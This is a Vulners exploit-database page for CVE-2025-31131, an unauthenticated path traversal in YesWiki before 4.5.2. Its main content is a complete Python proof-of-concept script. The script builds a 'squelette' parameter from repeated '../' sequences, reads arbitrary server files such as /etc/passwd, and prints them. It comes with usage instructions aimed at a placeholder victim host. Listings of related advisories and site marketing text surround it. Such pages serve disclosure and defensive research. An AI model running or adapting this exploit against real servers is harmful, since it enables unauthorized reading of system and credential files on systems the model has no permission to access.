Vulners
Lucene search
๐ YesWiki 4.5.1 Path Traversal
๐๏ธย 07 Apr 2025ย 00:00:00Reported byย Al Baradi JoyTypeย 
ย packetstorm๐ย packetstorm.news๐ย 155ย Views
| Reporter | Title | Published | Views | Family All 20 |
|---|---|---|---|---|
 | Exploit for Path Traversal in Yeswiki | 4 Apr 202515:31 | โ | githubexploit |
| Exploit for Path Traversal in Yeswiki | 7 Jun 202509:18 | โ | githubexploit |
 | CVE-2025-31131 | 1 Apr 202516:32 | โ | circl |
 | YesWiki ่ทฏๅพ้ๅๆผๆด | 1 Apr 202500:00 | โ | cnnvd |
 | CVE-2025-31131 | 1 Apr 202514:56 | โ | cve |
 | CVE-2025-31131 Path Traversal allowing arbitrary read of files in Yeswiki | 1 Apr 202514:56 | โ | cvelist |
 | YesWiki 4.5.1 - Unauthenticated Path Traversal | 7 Apr 202500:00 | โ | exploitdb |
 | EUVD-2025-9333 | 3 Oct 202520:07 | โ | euvd |
 | Yeswiki Path Traversal vulnerability allows arbitrary read of files | 1 Apr 202518:31 | โ | github |
 | Yeswiki < 4.5.2 - Unauthenticated Path Traversal | 4 Jun 202603:48 | โ | nuclei |
10
# Exploit Title: YesWiki < 4.5.2 - Unauthenticated Path Traversal
# Exploit Author: Al Baradi Joy
# Exploit Date: April 6, 2025
# CVE ID: CVE-2025-31131
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://github.com/YesWiki/yeswiki
# Affected Version: < 4.5.2
# Tested On: YesWiki 4.5.1 on Ubuntu 22.04
# Vulnerability Type: Unauthenticated Path Traversal (LFI)
# CVSS Score: 8.6 (High)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
# Description:
# YesWiki before version 4.5.2 is vulnerable to unauthenticated path
traversal via the 'squelette' parameter.
# A remote attacker can exploit this issue to read arbitrary files on the
server, such as /etc/passwd.
import requests
import sys
def banner():
print("=" * 80)
print(" YesWiki < 4.5.2 - Unauthenticated Path Traversal
(CVE-2025-31131)")
print(" Exploit Author: Al Baradi Joy")
print("=" * 80)
def exploit(target, filename="/etc/passwd"):
if not target.startswith("http"):
target = "http://" + target
traversal = "../" * 8
encoded_file = filename.replace("/", "%2f")
payload =
f"/?UrkCEO/edit&theme=margot&squelette={traversal}{encoded_file}&style=margot.css"
url = target.rstrip("/") + payload
try:
print(f"[+] Target: {target}")
print(f"[+] Attempting to read: {filename}")
response = requests.get(url, timeout=10)
if response.status_code == 200 and "root:" in response.text:
print("[+] Exploit successful. File contents:\n")
print(response.text)
else:
print("[!] Exploit failed or file not readable.")
print(f"Status Code: {response.status_code}")
if len(response.text) < 200:
print(f"Response:\n{response.text}")
except requests.exceptions.RequestException as e:
print(f"[!] Request failed: {e}")
if __name__ == "__main__":
banner()
if len(sys.argv) < 2:
print(f"Usage: python3 {sys.argv[0]} <target_url> [file_to_read]")
print(f"Example: python3 {sys.argv[0]} http://victim.com
/etc/passwd")
sys.exit(1)
target_url = sys.argv[1]
file_to_read = sys.argv[2] if len(sys.argv) > 2 else "/etc/passwd"
exploit(target_url, file_to_read)Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
07 Apr 2025 00:00Current
9.1High risk
Vulners AI Score9.1
CVSS 3.17.5 - 8.6
EPSS0.12044
SSVC